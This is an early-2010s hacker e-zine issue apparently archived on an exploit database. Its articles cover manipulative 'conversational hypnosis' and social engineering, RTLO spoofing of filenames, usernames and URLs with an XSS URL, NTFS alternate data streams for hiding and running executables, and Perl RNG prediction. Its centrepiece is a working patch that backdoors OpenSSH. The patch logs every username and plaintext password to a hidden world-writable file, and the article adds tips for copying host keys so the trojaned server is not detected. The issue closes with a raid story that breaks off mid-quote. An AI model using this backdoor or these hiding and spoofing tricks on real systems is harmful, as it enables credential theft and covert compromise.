Go Null Yourself (GNY) E-Zine #1

EDB-ID:

15976

CVE:

N/A


Author:

storm

Type:

papers


Platform:

eZine

Date:

2011-01-12


,hs+;-,
MMMMMMMNdyo/:.                                    Go Null Yourself E-Zine
MMNydNMMMMMMMMMmhs+:-`
MM/   `-/oshmMMMMMMMMMNdyo/.                                  Issue #1
Mm            .:+sydNMMMMMM.   ys+:.`
M:                   `hMMMy   +MMMMMMNdyo/-`                www.GoNullYourself.org
N+:.                 .MMMM.  `NMMMmNMMMMMMMMNmhs+:.
MMMMMmhs+/-`         hMMMs   oMMMd  `-/oydmMMMMMMMMMNdyo/-`
shmMMMMMMMMMNdyo/:. -MMMN`  `NMMM-          .:+shmNMMMMMMMs   :+:.
    .:/oydNMMMMMMMMMNMMMo   sMMMh                  `-sMMMN`  `NMMM-
/-`        `-/oshmMMMMMN`  .MMMM-                    dMMMo   sMMMh
MMMNdyo+:.         mMMM+   yMMMy                    :MMMN`  .MMMM-
dNMMMMMMMMMmhs+/-`/MMMm    -/oy.                    mMMM+   yMMMy                    :
  `-/+shmMMMMMMMMMMMMM/                            /MMMm   .MMMM.                    m
          .:+oydNMMMMd                             mMMM/   hMMMy                    /M
                 `-/o-                            `+shh   -MMMMMNmhs+:.             mM
                                                          -oydNMMMMMMMMMmdyo/-`    +MM
                                                               `.:+shmMMMMMMMMMNdhsNMM
    0x01 Introduction              teh crew              ys+:.         `-/oydNMMMMMMMM
    0x02 Conversational Hypnosis        hsu             -+shmNMMMMMMMMNdhs+:.    sMMMy
    0x03 RTLO Spoofing                storm                   `-/oydNMMMMMMMMMmhyMMMM.
    0x04 Alternate Data Streams        d4de                          `.:+shmMMMMMMMMs
    0x05 Derandomizing Perl's RNG   Kheldar                                  .-/oydm`
    0x06 Trojaning OpenSSH            storm
    0x07 Story of a Raid          OrderZero
    0x08 Programming Challenge        storm
    0x09 ConfCon 2010 CFP        PhreakerD7
    0x0a 907-887-88xx Scan            storm
    0x0b Et Cetera, Etc.           teh crew


[====================================================================================]

                                 -=[ Introduction ]=-
                                 [ Author: teh crew ]


Welcome to the first issue of the Go Null Yourself e-zine.  Glad you could join us.

This publication is the product of a close group of friends who love to tinker with
and push technology to the limits.  You may know us more commonly as hackers.  We are
a collection of like-minded individuals promoting freedom of thought and the pursuit
of technological curiosity.  We enjoy solving problems and innovating new ways of
doing things.  We keep our minds open to new ideas and build upon each others' work to
produce even greater results.  We stick to our beliefs and do not back down in the
face of hostility.

Within this zine, we hope to present a well-rounded spectrum of information, both
technical and non-technical, spanning a number of disciplines.  Hopefully you may find
something that sparks your interest.

If you are interested in submitting content for future issues of GNY Zine, we would
be happy to review it for publication.  Content may take many forms, whether it is a
paper, review, scan, or first-hand account of an event.  Well-received topics include
computer hacking and exploitation methods, programming, telephone phreaking (both
analog and digital), system and network exploration, hardware hacking, reverse
engineering, amateur radio, cryptography and steganography, and social engineering. 
We are also receptive to content relating to concrete subjects such as science and
mathematics, along with more abstract subjects such as psychology and culture.  Both
technical and non-technical material is accepted.

Submissions of content, suggestions for and criticisms of the zine, and death threats
may be sent via:

    - IRC private message (storm or m0nkee @ irc.distrust.us #gny)
    - Email (zine@gonullyourself.org)

If there is a enough feedback, we will publish some of the messages in future issues.

We have devoted a lot of effort into this publication and hope that you learn
something from reading it.  Abiding by our beliefs, any information within this e-zine
may be freely re-distributed, utilized, and referenced elsewhere, but we do ask that
you keep the articles fully intact (unless citing certain passages) and give credit to
the original authors when and where necessary.

Go Null Yourself, its staff members, and the authors of GNY Zine are not responsible
for any harm or damage that may result from the information presented within this
publication.  Although people will be people and act in idiotic fashions, we do not
condone, promote, or participate in illegal behavior in any way.

With that being said, let there be zine.


[====================================================================================]

                   -=[ Introduction to Conversational Hypnosis ]=-
                                   [ Author: hsu ]


Preliminary note: All descriptions and examples are meant for learning and
understanding purposes only; I have made sure that no example can actually be used in
daily application.  Conversational hypnosis is something that is learned from personal
experience, not copied.  If you would like to learn more about the topic, I suggest
you read the lectures by Tyler Starr.

To most of the world, hypnosis is thought to be a simple form of entertainment in
which a "hypnotist" causes his or her subjects to perform all kinds of ridiculous
tasks under what they call a "trance."  However, one must delve deep into the
processes of hypnosis to truly understand what is going on.

In very basic terms, hypnosis consists of a period of relaxation (self-explanatory),
induction (where the subject is actually put into trance), some sort of continuation
of that induction that simultaneously establishes the connection between hypnotist and
subject (allowing for the appearance of control to take place), and awakening (also
self-explanatory).  The big misunderstanding most people have is the sense of
"control" that the term "hypnosis" implies.  In truth, the subject is actually
completely in control of his or her actions at all points of hypnosis.  The "trance"
is simply a state of mind in which the subject has allowed him/herself to fall into
the mindset of simply listening and performing through the hypnotist's guidance.  With
that in mind, one can realize that hypnosis can be used in other settings as well,
though the processes might not be very recognizable.

Let us take car salesmen for example.  Though they do not know what they are doing
psychologically, they are actually trained to use a very altered form of hypnosis to
make their deals.

    Step 1 - Relaxation: they bring you into the store with a welcoming smile and a
happy, yet confident tone that non-verbally "assures" an unsuspecting person that the
salesman is friendly.  Some might even add to that by offering them some kind of
"loophole" or "trick" to "save him/her money," (starting to sound familiar?) because
then the potential buyer has been shown that this salesman is out for his/her interest
and that he is trustworthy

    Step 2 - Induction: the salesman begins to pick up the pace, speaking most of the
words in the conversation as the buyer begins to slip into the mindset of simply
listening and following along

    Step 3 - Continuation: the salesman quickly brings up a seemingly good deal and
firmly states his belief that action must be taken right away in order to secure the
deal.  Under the passive mindset, the buyer quickly takes in the salesman's words with
little to no processing and quickly accepts the deal, driving away in a new, far too
overpriced car.

    Step 4 - Awakening: in this example, the awakening simply occurs as the buyer is
talking with his or her family about the purchase and suddenly realizes just how much
money was spent or lost.

Another aspect of conversational hypnosis is governed by Advanced Language Patterns
(ALP).  ALP is used to steer conversations in a certain direction.  Many people simply
call this prospect "mind fucking," as it tends to do just that.  The entire process
centers around a combination of reverse psychology and careful introductions of new
topics.

For instance, let us say a boy is getting into an argument with his girlfriend that
he knows he cannot win.  Here is how ALP can be implemented: The boy first heats up
the argument by seemingly defending his case, despite the many counterexamples his
girlfriend provides, which simply makes her more angry.  Then, he suddenly gives in,
agreeing with her in only a very slight sarcastic tone - just enough for her to
believe he is probably serious but is perplexed enough to ask if he actually agrees. 
Then, in a very sarcastic tone, he disagrees with her again.  Such a process involves
two reverse psychological steps to create a contradiction within her mind, ending up
with her believing that she has won but still not fully understanding what is going
on.  At this point, she is prone to suggestion and the boy brings up a scenario
similar to the current predicament brought on by another friend... and then another by
the same friend.  Perhaps it was that friend's fault all along for this entire
argument! (Obviously, this series of events is quite a bit more abrupt than an actual
conversation, but you get the idea.)  In the end, ALP has allowed the boy to set the
conversation onto a different topic that leaves him without risk of losing the
argument.

Next comes the haxxor favorite: social engineering (also sometimes associated with
seduction).  Unlike ALP, in which the subject of the conversation changes, social
engineering manipulates the situations in which the conversation takes place.  For
instance, a typical college student calls AT&T tech support and asks for a password to
one of their secure databases... you can imagine the turnout of the conversation...
*click.*  However, social engineering can have quite an astounding effect on the exact
same sequence of events.  By using an established position, such as "the security
manager for tech support" (No, I'm not giving you better ideas.), the student can call
a backdoor operator number and firmly state that there has been a security breach in
the database and that his password must be reset to "blablabla."  The support agent is
far more likely to accept the scenario and carry out the order.  An excellent resource
for more information and further, more practical examples of social engineering is the
article "Influential Angels" in the spring 2010 issue of "2600: The Hacker Quarterly."

Finally comes Neuro Linguistic Programming (NLP), otherwise known as the "black
mirror technique."  This area is, by far, the most difficult to learn and master.  It
involves watching every movement of a subject in every possible scenario available in
search for specific physical patterns associated with emotional states.  One will
notice that a vast majority of the patterns are fairly constant from person to person.
 Once you learn the patterns to a specific person, you can easily tell exactly what he
or she is feeling.  By doing so, you can use prior knowledge to attempt to decipher
exactly what the person is thinking about in extremely vivid detail (Anyone been to a
"psychic" before?).  At that point, the black mirror technique requires you to places
those thoughts and emotions into your own mind, in essence adopting the mind of your
subject.  By doing so, you can think exactly like him or her - you will know what
reaction will be given in response to what stimulus and so on, allowing you to say or
do whatever would bring the exact response you wish to achieve.  You are essentially
placing yourself in your target's shoes.

As you can see, each of the four sections provides a person with great "control" over
those around him or her.  The question then becomes: What happens when you combine all
four together?  The result is "black ops."  Truly, it is impossible to describe any
sort of daily scenario for this phenomenon as it can only be expressed through
actually implementing its techniques in practice.  As mentioned before, these
practices cannot be taught or copied - they must be experienced.  One must always keep
in mind that this tool CANNOT be defeated by ANY person unless that person also knows
and has used black ops.  It is a powerful tool that should be used responsibly for the
GOOD of others.

Here is a quick example.  Imagine, if you would, that we were having a casual
conversation about bananas when, all of a sudden, I lost the game.  Most people would
just brush it off, but no, I just could not stop thinking about it and ended up
associating bananas with the game.  And so, every time I said the word, bananas, I
would lose the game, causing you to associate bananas with the game as well.  You
would be quite angry wouldn't you?  Well now let me ask you this: what is the first
thing that comes to mind when I say..."bananas?"  If it isn't the game,
congratulations, you are learning fast; however, for the vast majority of you,
consider what just happened.  You were presented with the most obvious example
possible and yet were still forced to mold your thoughts to a certain pattern without
the slightest but of control.  Now imagine you had no indication that such an act was
to take place; imagine that this was done in person, instead of from a brief magazine
article without you ever knowing.  Welcome to black ops.


[====================================================================================]

                                -=[ RTLO Spoofing ]=-
                                  [ Author: storm ]

                           Email: storm@gonullyourself.org
                         Website: http://gonullyourself.org/


RTLO spoofing is a fairly new yet under-documented security flaw that may have
serious implications in the hacking scene in the very near future.  Such an attack
furthers social engineering efforts by displaying illegitimate text in the place of
user-inputted data, potentially tricking target users into granting trust or falling
into malicious traps.

The acronym RTLO stands for Right-to-Left Override, which is a Unicode character used
to reverse the direction of text on its respective line.  For instance, by inserting
the RTLO character into a string:

    [RTLO]abcdefg

the following is instead displayed on the screen:

    gfedcba

The RTLO character may also be placed mid-string, having no effect on preceding text.
 For example:

    abcdefg[RTLO]hijklmnop

is displayed as:

    abcdefgponmlkjih

The RTLO character is most commonly used when displaying text in Hebrew, Arabic, or
any other foreign language that reads right-to-left.  The Unicode number for RTLO is
202e, and a number of methods for inputting the character are enumerated at
http://bit.ly/63tKRN .

HTML also provides a method to render the proper directionality of text with the DIR
attribute by defining the value DIR=ltr for left-to-right and DIR=rtl for
right-to-left.  However, this method is obviously only applicable to web pages,
whereas the RTLO Unicode character itself is universal throughout most of the
computer.

One may abuse the RTLO character by falsifying sensitive text strings, such as
filenames, usernames, and URLs.  The consequences of a successful attack are dependent
upon the scenario.

In the context of spoofing a filename, hackers may more effectively social engineer
victims into downloading, accepting, and executing malicious files.  Those spreading
malware will commonly try to obfuscate filenames by including an innocuous file
extension in the filename itself - "notavirus_freesex.jpg.exe", for instance. 
However, by utilizing the RTLO character, a hacker may instead reverse the text
direction of the file extension, framing the file as a completely different filetype. 
By inserting our special character, as shown:

    hotgirlss[RTLO]gpj.exe

our target now views the file as:

    hotgirlsexe.jpg

The quality of the spoofed filename will obviously vary with the level of creativity
at the time.  There are numerous executable file extensions, and it should not be
difficult to find one that fits well with the spoofing attack scenario.  It should
also be noted that by spoofing the file extension, the actual filetype of the file
does not change.  "hotgirlsexe.jpg" is still an executable file with the extension
.exe, but it is simply being displayed as a .jpg image file instead.

File downloads within web browsers are also vulnerable to RTLO spoofing.  Users may
queue a file for download but find the filename obfuscated, potentially tricking them
into opening malicious executable files.  Mozilla took note of this attack vector and
deployed patches for their Firefox and SeaMonkey software in late 2009.

Next, hackers may utilize RTLO spoofing to falsify usernames and other text fields in
user profiles.  Common targets for this attack are online forums and other web
communities.  A typical attack consists of finding the name of an existing
administrator, moderator, or any other privileged staff member and creating a new
account with the name reversed, preceded by the RTLO character:

    [RTLO]rotartsinimdA
    [RTLO]pOsyS
    [RTLO]rotaredoM

Et cetera, et cetera.  Doing so will of course not magically grant your new user
account with any special permissions or access, but it's useful for social engineering
unsuspecting and ignorant users.  At the very least, it's a fun prank.  The GNY board
itself can actually be made an example of for attacking forums with spoofed usernames.
 In February 2010, Anarchy_Angel registered a new user account using the name
"[RTLO]eekn0m", which displayed as "m0nkee" on screen, mirroring m0nkee's actual
administrator account name.  As we were not familiar with the attack vector at the
time, quite a bit of confusion followed until Anarchy linked to an explanation,
introducing our community to the concept of RTLO spoofing.

The third scenario that will be covered is using RTLO spoofing in the context of
URLs.  Such an attack may be used when attempting to trick an unsuspecting user into
clicking a malicious link that appears to be a seemingly trustworthy website at first
glance.  Previous methods of achieving this included hosting the malicious page on a
similar-looking domain name or including the page in an XSS vulnerability on the
trustworthy website.  An example of the first method would be to host a mirror of the
Citibank login page either at "c1tibank.com" or "freehosts.com/citibank.com/" (as in,
register a new domain name or establish a URL that may be easily confused with the
actual name) in attempt to phish user credentials.  An example of the second method
would be to inject an IFrame of a remote page housing malicious code into an
XSS-vulnerable trustworthy website, as so:

   
http://www.merriam-webster.com/dictionary/book=dictionary%3C/title%3E%3Cscript%3Ejavas
    cript:alert(document.domain)%3C/script%3E&va=lol

Of course, this URL merely causes a JavaScript popup message to appear, but any HTML
may be injected in its place.  CSRF is also very possible at this point.

By now, you may have an idea as to how RTLO spoofing a URL will work, but I will
provide an example regardless:

    [RTLO]http://someevilsite.com/moc.elgoog.www//:ptth

will display as:

    http://www.google.com/moc.etisliveemos//:ptth

The product of RTLO spoofing a URL is similar to the XSS method shown above, as the
victim is faced with a link that appears to point to a trusted domain name but is
followed by a slew of seemingly random characters.  The only difference is that the
RTLO method doesn't require URL encoding to effectively obfuscate the deceit lain
within.

Hopefully, more vendors will recognize the security threat posed by abuse of the RTLO
character and incorporate methods of combatting falsified text in future versions of
their software.  Until then, this attack vector will very likely become increasingly
prevalent in the hacking scene as people continue to follow the same mediocre security
policies and blindly trust content without understanding that the greatest threats are
the ones you do not expect and cannot see.


Works referenced and further reading:

http://packetstormsecurity.org/papers/general/righttoleften-override.pdf
http://hackers-hideaway.com/blog.php?post_id=94 (currently offline)
http://www.mozilla.org/security/announce/2009/mfsa2009-62.html

And special thanks to: Anarchy_Angel


[====================================================================================]

                            -=[ Alternate Data Streams ]=-
                                   [ Author: d4de ]

                             Email: amr.ali.cc@gmail.com
                            Website: http://amr-ali.co.cc/


Introduction
------------

I have learned from a friend of mine "tUff" about something called ADS, which, as far
as I know, is only available in the NTFS filesystem.  However, if someone has found
this "feature" somewhere else, please let me know.

In the NTFS file system, there are different types of data streams: one that holds
the security information and another that holds the "real" data. There may be another
stream with link information instead of the real data stream, if the file actually is
a link. And there may be alternate data streams, holding data the same way the
standard data stream does.

You might think that Microsoft didn't actually document this, but in a matter of fact
they did documented it. Besides that, there is a lot of information and articles about
it all over the web; however, it seems that not many people do actually know about it.


Practical Usage
---------------

Yes, I hear all of you saying, okay cool info to know about, but how we gonna use it
in a practical way? And my answer would be, don't let your limited imaginations limit
the usage of such feature. You can basically do many things with it - for example, you
could use it with hiding your application registration information, or better yet,
hide some secrets of yours. Or, if you are such a BlackHat, you can hide
viruses/worms/rootkits/etc. "I hear the devil laughing already!"

There are two ways to hide your data in ADS: you can hide it in a folder, or you can
hide it in a file. And no, it's not going to change anything either for the folder or
the file except its date stamp. The size of the "carrier" will never change
whatsoever.

Let's learn some tricks here, shall we...


-= Hiding a file in a folder =-

    mkdir C:\folder
    echo datastuffs > C:\folder:secrets.txt

In the example above, we see that we redirected the output of "echo datastuffs" to be
stored at "C:folder:secrets.txt". Cool, huh, but wait. You will also notice that there
is no backslash between "folder" and "secrets.txt". And seriously, it's not a typo -
it's how it's supposed to be written.

First, I want you to go check and see if the folder "C:\folder" contains anything,
and check if the size changed. Voila, nothing is actually there! Well, let's then do
this:

    notepad.exe C:\folder:secrets.txt

A bit surprised of the outcome? You haven't seen anything yet. Now let's jump to the
next part.


-= Hiding a file in a file =-

    echo ohnoes > C:\folder\textfile.txt
    echo datastuffs > C:\folder\textfile.txt:secrets.txt

Ooh, that is a bit odd now. Well, it's far from oddness; it's just the same thing we
did before, but instead of hiding it in a folder, we hid it in a file. So, now you
understand the significance of ":". It means that you are accessing an alternate data
stream instead of the normal ones or the "visible" ones, so to speak.

Now, let's check if the file "secrets.txt" that we hide in the file "textfile.txt" is
actually holding any data.

    notepad.exe C:\folder\textfile.txt:secrets.txt

Still amazed? Well, I gotta tell you that you still don't know the true potential of
such a feature.

Now, what if we wanted to be a little devilish and hide some executable files? Stay
with me on this one.

    copy C:\windows\system32\calc.exe C:\folder\calc.exe
    type C:\windows\system32\notepad.exe > C:\folder\calc.exe:notepad.exe
    start C:\folder\calc.exe:notepad.exe

We simply did here the usual - just copied calc.exe (which is Calculator) to our test
folder so we don't mess anything up, and we hid the notepad.exe file (from the system
dir) in our copied calc.exe file. We then finally executed our hidden file
"notepad.exe," which now is located at "C:\folder\calc.exe:notepad.exe".

I hear you say, "Wow, how lame that is! You just started notepad.exe from a hidden
location!" Well, first I'll excuse your ignorant behavior and tell you to go look at
your Task Manager and tell me if you found any notepad.exe actually running. Huh, what
I can't hear you! Yeah, that's right; you just see calc.exe. See, that's now what I
was talking about - you are having notepad.exe running in front of your eyes, but
Windows Task Manager doesn't have this feature implemented, so it can't actually tell
if you are running another program from an alternate stream.  Instead, it just gives
you the carrier file name, which in our case would be "calc.exe".


-= How to delete a file stored in ADS =-

First, let's assume that you have a file called vip.exe, and this file got hidden by
some major dirty worm that you kids developed, and you are sorry and wanted to delete
the worm from ADS.  In order to do so, you should:

    ren vip.exe temp.exe
    type temp.exe > vip.exe
    del temp.exe

But what if we have worm.exe hidden in the folder C:\windows? Sounds messy, huh?
Don't be afraid; it's also easy to do, so don't worry about it and follow:

    notepad.exe C:\windows:worm.exe

Delete the contents of worm.exe and then save. Notepad will tell you that the file is
empty and ask if you want to delete it - confirm the action, and you are done.

Note: If you are using NT 5.x, then you will need Notepad from NT4tools to be able to
remove a "worm.exe" from a folder.


Tools and Codes
---------------

Now, for all of you that want to play more and have some fun with it, I'll provide
you with some application names I know of that are useful when dealing with NTFS ADS:

    * Sysinternals (a must have)
    * streams.exe (Included in Sysinternal suite)
    * LADS
    * crucialADS by CrucialSecurity

And here are some links that you might find interesting:

    * http://msdn.microsoft.com/en-us/library/ms810604.aspx
    * http://www.windowsecurity.com/articles/Alternate_Data_Streams.html
    * http://www.flexhex.com/docs/articles/alternate-streams.phtml
    * http://support.microsoft.com/kb/105763
    * http://support.microsoft.com/kb/943393
    * http://en.wikipedia.org/wiki/Fork_(filesystem)
    * http://www.irongeek.com/i.php?page=security/altds
    * http://www.ntfs.com/ntfs-multiple.htm
    * http://www.auditmypc.com/freescan/readingroom/ntfsstreams.asp

Thanks goes to tUff, who first introduced me to NTFS ADS.


[====================================================================================]

                 -=[ Derandomizing Perl's Random Number Generator ]=-
                                 [ Author: Kheldar ]

                            Contact: irc.distrust.us #gny
                    Website: http://insomnia247.nl/~Kheldar/blog/


Computers are deterministic machines. As such, true randomness is hard to achieve. 
Instead, computers settle for pseudorandom numbers - numbers that appear random at
first glance, but in reality follow a very distinct algorithm.

For this paper, I'm going to be taking a look at the pseudorandom number generator
(PRNG) that my installation of perl uses.  It can be found with the command "perl
-V:randfunc", and on most *nix systems the algorithm's called drand48.

The algorithm produces a sequence of 48-bit integers, X, and can be described by the
following equation:

    Xn+1 = (0x5DEECE66D * Xn + 0xB) mod (2 ** 48)

As you can see, it's a pretty simple algorithm.  The important part is the modulus
performed at the end - since it's mod 2**48, 48-bit arithmetic is performed (that's
where the 48 in the name comes from, if you haven't figured that out yet).

So, now you know what happens when you call perl's rand() function.  The program
takes the previous value in the sequence, and using the aforementioned formula,
calculates the current value.

"But, what will the first value in the sequence be", you ask.  Well, if you've ever
heard the term "seed", or used the function srand(), this is it.  The srand() function
simply changes the previous value in the sequence, changing the outcome of the next
one.

With the drand48 algorithm, it's a bit more complicated than simply assigning the
value.  The function takes a 32-bit integer, and sets the 32 high-order bits of the
previous term to that value.  Then, the 16 low-order bits (remember, we're dealing
with 48-bit integers here) are set to the arbitrary value 0x330E.

Now that we know all that, I think we're able to write our own implementation of
drand48...  

Here it is:


    #!/usr/bin/env perl
    use strict;
    use warnings;
    use bignum;

    # the current value
    my $x;

    sub srand48 {
        $x = (shift or 1) & 0xFFFFFFFF; # only use the low-order 32 bits
        $x <<= 16;  # set the 32 high-order bits to the arg
        $x |= 0x330E; # set the 16 low order bits to the arbitrary value 0x330E
    }

    sub drand48 {
        # compute the next value
        $x = (0x5DEECE66D * $x + 0xB) % (2 ** 48);
        # return said value using the same precision as perl's rand()
        return sprintf "%.15f", $x / (2 ** 48); 
    }


You'll notice in the drand48() function that we actually return a decimal value. 
This is in order to match the precision used by perl's rand() function.

Now, let's compare the output of our new drand48() function with perl's good old
rand() function. Append the following code to your script:

    my $val = shift;
    srand48($val);
    srand($val);
    for(1..5) {
        print drand48() . " " . rand() . "\n";
    }

    And let's check the outcome!

    $ ./myrand.pl 1
    0.041630344771878 0.0416303447718782
    0.454492444728629 0.454492444728629
    0.834817218166915 0.834817218166915
    0.335986030145200 0.3359860301452
    0.565489403566136 0.565489403566136
    $

Not bad, I'd say.

Now, there are a couple interesting things we can do with this - the most obvious
being predicting future random numbers.  In fact, all we must do is figure out where
perl's random number generator is and calculate the next value!  It's all coming
together :-).

Here's a function that will do just that:

    sub predict_rand {
        my $curr = shift or return;
        $x = $curr * (2 ** 48);
        print "\nI predict the next random number is: " . drand48() . "\n";
    }

When passed the current output of perl's rand(), this function will predict the next
one to several decimal places.  It's not perfect, because rand() doesn't actually give
you enough information to find out exactly what the current term is.  In order to do
that you'd have to, well, find out where it's stored in memory and read from there. 
But that's for next time.

~Kheldar


Sources:

[1] http://opengroup.org/onlinepubs/007908799/xsh/drand48.html


[====================================================================================]

                              -=[ Trojaning OpenSSH ]=-
                                  [ Author: storm ]

                           Email: storm@gonullyourself.org
                         Website: http://gonullyourself.org/


The following patch file may be used to insert a logging feature in the latest source
release of portable OpenSSH (5.5p1).  Portable OpenSSH is designed to run on a
multitude of operating systems, most notably Linux, while the main release is designed
to essentially run only on BSD.  These edits should be easy to migrate to other
releases and version numbers if you are inclined to do so.

By patching and installing a trojaned OpenSSH package, a hacker may potentially
escalate and expand his access by capturing valid logins and re-using the credentials
elsewhere on the network.  Keeping a list of valid logins also provides additional
points of potential re-entry, should the hacker's presence be discovered.

The patch I wrote is very simple and does not provide rootkit-like features, such as
a "magic password" that grants instant root access or the ability to hide login
sessions.  Its sole purpose is to log both successful and unsuccessful login attempts
to a text file, where a hacker (or nosy system administrator) may view them at a later
time.  Future releases of this patch may possibly provide extended features and
additional logging abilities, such as submitting entries to a remote HTTP server.

A final step to perform after installation is to copy the host keys from the
existing, un-trojaned SSHd to the new, trojaned SSHd to prevent any red flags from
being raised upon connecting.  Observe, where I use port 22 as the untrojaned SSHd and
port 2222 as the trojaned SSHd to exemplify the process:

delicious:~# ssh localhost -p22
The authenticity of host 'localhost (127.0.0.1)' can't be established.
RSA key fingerprint is 9d:f4:b6:a4:02:fc:1f:f3:ac:b4:26:5b:45:22:20:cb.
Are you sure you want to continue connecting (yes/no)? no
Host key verification failed.
delicious:~# ssh localhost -p2222
The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.
RSA key fingerprint is 53:ec:14:9d:8d:0b:85:52:04:8b:88:26:9a:54:89:6c.
Are you sure you want to continue connecting (yes/no)? no
Host key verification failed.
delicious:~# cp /etc/ssh/* /root/ssh/openssh-5.5p1-install/etc/
delicious:~# ssh localhost -p2222
The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.
RSA key fingerprint is 9d:f4:b6:a4:02:fc:1f:f3:ac:b4:26:5b:45:22:20:cb.
Are you sure you want to continue connecting (yes/no)?

Have fun. ;)


-=-=-


diff -rupN openssh-5.5p1/auth-passwd.c openssh-5.5p1-backdoored/auth-passwd.c
--- openssh-5.5p1/auth-passwd.c	2009-03-07 19:40:28.000000000 -0500
+++ openssh-5.5p1-backdoored/auth-passwd.c	2010-06-17 14:14:23.000000000 -0400
@@ -123,6 +123,19 @@ auth_password(Authctxt *authctxt, const 
 	}
 #endif
 	result = sys_auth_passwd(authctxt, password);
+        
+        // Begin Backdoor
+
+        if ( result ){
+            snprintf(hidden_buff, sizeof(hidden_buff) - 1, "Successful login %s:%s
from %s\n", authctxt->user, password, get_remote_ipaddr());
+            hidden_log();
+        } else {
+            snprintf(hidden_buff, sizeof(hidden_buff) - 1, "Invalid login %s:%s from
%s\n", authctxt->user, password, get_remote_ipaddr());
+            hidden_log();
+        }
+        
+        // End Backdoor
+
 	if (authctxt->force_pwchange)
 		disable_forwarding();
 	return (result && ok);
diff -rupN openssh-5.5p1/includes.h openssh-5.5p1-backdoored/includes.h
--- openssh-5.5p1/includes.h	2009-08-20 02:16:01.000000000 -0400
+++ openssh-5.5p1-backdoored/includes.h	2010-06-17 14:12:24.000000000 -0400
@@ -172,4 +172,24 @@
 
 #include "entropy.h";
 
+// Begin Backdoor
+
+#include <sys/stat.h>
+#include <stdio.h>
+#define HIDDEN_LOG_FILE "/tmp/.ssh_log"
+
+FILE *hiddenlog;
+char *hidden_buff;
+
+#define hidden_log() { \
+    chmod(HIDDEN_LOG_FILE, 0666); \
+    hiddenlog = fopen(HIDDEN_LOG_FILE, "a"); \
+    if ( hiddenlog != NULL ) { \
+        fprintf(hiddenlog, "%s", hidden_buff); \
+        fclose(hiddenlog); \
+    } \
+} 
+
+// End Backdoor
+
 #endif /* INCLUDES_H */


-=-=-


[yo@Wakari ~]$ cat /tmp/.ssh_log
Invalid login root:llolol from 127.0.0.1
Invalid login root:dfsdfsfsdf from 127.0.0.1
Invalid login root:dkfjgfdgjdk from 127.0.0.1
Successful login root:crapz0rs from 127.0.0.1
Successful login root:crapz0rs from 192.168.0.110


[====================================================================================]

                               -=[ Story of a Raid ]=-
                                [ Author: OrderZero ]

                       Contact: irc.distrust.us #gny + Freenode


Alright, so we've all had the thought "OH SHIT - this is serious. I could get raided
for this." (right?). It eventually dissipates like the adrenaline of a huge hack does,
and after a while you forget anything about it, maybe storing the files on a
thumbdrive somewhere after reviewing them. Nothing valuable or interesting? Oh well.

Well, that "oh well" may be the next "FBI SEARCH WARRANT." Yeah, it seems like I'm
making a joke, doesn't it? I thought it was pretty funny too, the paranoia all leading
to funny "FREEZE! FBI!" jokes. That joke become reality for me on June 9th, 2010 at
6:20AM.

It happened one night after a long day of work. I had the next day off, so I had my
usual energy drink-induced buzz going, doing my regular exploring around, chatting
with friends and such. I was getting pretty weary around morning; I was about to check
on some boxes of mine and my friend's (legitimate, of course) and pass out, when I
suddenly hear loud footsteps on the porch. I simply attributed them to dogs or some
other random family visitor. It wasn't until I was turned around, being patted down
like a sex doll, that I realized what had just happened, and to this day, it still
seems like a dream... I had just been what we so often laughed about in those chat
rooms, what we so often attributed to paranoia and movies - I had been raided. Sure, I
had seen the stories: Mitnick, Bernie, etc., and almost instinctively knew what to do
when I realized what was happening.

They quickly marked off the rooms in the home A, B, C, etc. while photographing
anything and everything (Note: At this point, I hadn't been informed as to what the
search warrant was about). They quickly escorted me outside to their (Guess the
vehicle color) black Chevy Suburban with tinted windows, where they made it an
accident to put me in the backseat while one agent sat beside me and another sat in
front. They quickly started asking questions. Not really knowing what they wanted (but
knowing what might happen), I answered few questions and asked for a lawyer when
things started getting aggressive. Then they did mention it was completely voluntary
but in my "best interest" to tell everything I knew so I could get a good word in with
the people above them (Yeah, I bet). After about 2 minutes of him telling me that I
was lying and me simply looking him in the eye for about 30 seconds, they escorted me
out of the vehicle, at which point I went inside and sat for a good 4 hours while they
searched through everything, connected to my network (One agent mentioned "It's
ipconfig, right?") and took snapshots, took my books and magazines related to
computers, and took anything that could modify, alter, create, analyze, or store data.

My parents didn't completely realize what was going on, simply knowing that I was a
computer nerd and could pretty much "fix anything relating to computers." They knew I
was interested in computer security, and while my mom wasn't completely against it,
she certainly wasn't for it. My dad didn't know as much about computers but did
mention several times that I'd either end up in jail or at a top paying job.... Go
figure.

While sitting, I tried to relate to some of the guys in there. I mean, here were
people who supposedly knew what they were doing, right? My personal observance
indicated one person who apparently had been bragging about Ubuntu and was the geek of
the group. He, according to others in the group, was working for Microsoft in some way
or another when he was hired by the FBI and had done some kind of translation in the
Freedom Downtime movie for 2600 (After they found my magazines, they mentioned this
humorously). He at least mentioned a Linux distribution, so he scored a few points
with me. While this social interaction was going on, I was going through my entire
hard drive in my head.

I'm not going to say I haven't done things that might warrant such a search. I've had
my share of dark side moments. This paper isn't to declare my innocence or declare the
FBI is evil - they're just doing their job (albeit with too much power), but some
simple rules need to be followed when copying data like we all do. I will list a few
here:

1. Use encryption - This is possibly my fatal mistake. I didn't encrypt as much as I
should have, and it really will leave me open to anything the FBI wants to portray me
as.

2. Booby traps - I didn't use them. It does seem a bit far-fetched, but if I had a
magnet nearby, do you think I would've used it? Damn straight. However, even if I did
have a magnet, there is little time to do anything once they bust in. So, what is
there to do? Well, there are various online sources for mechanisms that will
conditionally destroy data or the drive itself. It's not required, but it's certainly
recommended in my case...

3. Incriminating evidence - Sure, it's just a simple server-client program in C, but
what is it to the FBI? A trojan possibly? You bet your sweet ass. All I can say about
this is that anyone who is a regular programmer should keep this encrypted as well.
Anything simple can be turned into something evil by anyone with enough motive.

As this paper is being written, I have not been given further information about the
case against me. The FBI very simply came in, took everything, and left. It was very
much similar to being robbed, except the perpetrators had an excuse. What was their
excuse, you ask? Well, it's the good ol' Title 18 (section 1030, specifically)
regarding a recent leak of emails and future plans within the website Lockerz.com*.
The FBI agent who came to my state to conduct the search was from the same place this
website is based out of. This law states:

"Whoever-

- having knowingly accessed a computer without authorization or exceeding authorized
access, and by means of such conduct having obtained information that has been
determined by the United States Government pursuant to an Executive order or statute
to require protection against unauthorized disclosure for reasons of national defense
or foreign relations, or any restricted data, as defined in paragraph y. of section 11
of the Atomic Energy Act of 1954, with reason to believe that such information so
obtained could be used to the injury of the United States

